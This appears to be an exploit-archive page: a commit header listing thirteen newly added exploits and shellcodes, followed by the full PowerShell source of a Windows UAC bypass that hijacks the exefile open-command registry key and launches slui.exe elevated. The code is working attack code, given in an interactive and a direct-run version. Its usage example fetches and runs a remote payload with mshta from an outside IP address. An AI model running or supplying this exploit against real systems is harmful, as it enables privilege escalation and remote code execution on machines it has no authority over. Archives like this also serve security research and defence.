8cbfa5df7f
13 changes to exploits/shellcodes HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write Netperf 2.6.0 - Stack-Based Buffer Overflow Thunderbird ESR < 60.7.XXX - Type Confusion Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow Exim 4.87 - 4.91 - Local Privilege Escalation Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell) AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit) RedwoodHQ 2.5.5 - Authentication Bypass CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities Spring Security OAuth - Open Redirector Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)
83 lines
No EOL
2.6 KiB
Text
83 lines
No EOL
2.6 KiB
Text
Interactive Version:
|
|
|
|
<#
|
|
.SYNOPSIS
|
|
This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
|
|
.NOTES
|
|
Function : SluiHijackBypass
|
|
File Name : SluiHijackBypass.ps1
|
|
Author : Gushmazuko
|
|
.LINK
|
|
https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1
|
|
Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
|
|
.EXAMPLE
|
|
Load "cmd.exe" (By Default used 'arch 64'):
|
|
SluiHijackBypass -command "cmd.exe" -arch 64
|
|
|
|
Load "mshta http://192.168.0.30:4444/0HUGN"
|
|
SluiHijackBypass -command "mshta http://192.168.0.30:4444/0HUGN"
|
|
#>
|
|
|
|
function SluiHijackBypass(){
|
|
Param (
|
|
|
|
[Parameter(Mandatory=$True)]
|
|
[String]$command,
|
|
[ValidateSet(64,86)]
|
|
[int]$arch = 64
|
|
)
|
|
|
|
#Create registry structure
|
|
New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
|
|
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force
|
|
|
|
#Perform the bypass
|
|
switch($arch)
|
|
{
|
|
64
|
|
{
|
|
#x64 shell in Windows x64 | x86 shell in Windows x86
|
|
Start-Process "C:\Windows\System32\slui.exe" -Verb runas
|
|
}
|
|
86
|
|
{
|
|
#x86 shell in Windows x64
|
|
C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas"
|
|
}
|
|
}
|
|
|
|
#Remove registry structure
|
|
Start-Sleep 3
|
|
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
|
|
}
|
|
|
|
|
|
################################################################################
|
|
|
|
|
|
Non-Interactive Version:
|
|
|
|
<#
|
|
.SYNOPSIS
|
|
Noninteractive version of script, for directly execute.
|
|
This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
|
|
.NOTES
|
|
File Name : SluiHijackBypass_direct.ps1
|
|
Author : Gushmazuko
|
|
.LINK
|
|
https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass_direct.ps1
|
|
Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
|
|
.EXAMPLE
|
|
Load "cmd.exe" (By Default used 'arch 64'):
|
|
powershell -exec bypass .\SluiHijackBypass_direct.ps1
|
|
#>
|
|
|
|
$program = "cmd.exe"
|
|
New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
|
|
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $program -Force
|
|
#For x64 shell in Windows x64:
|
|
Start-Process "C:\Windows\System32\slui.exe" -Verb runas
|
|
#For x86 shell in Windows x64:
|
|
#C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process "C:\Windows\System32\slui.exe" -Verb runas"
|
|
Start-Sleep 3
|
|
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force |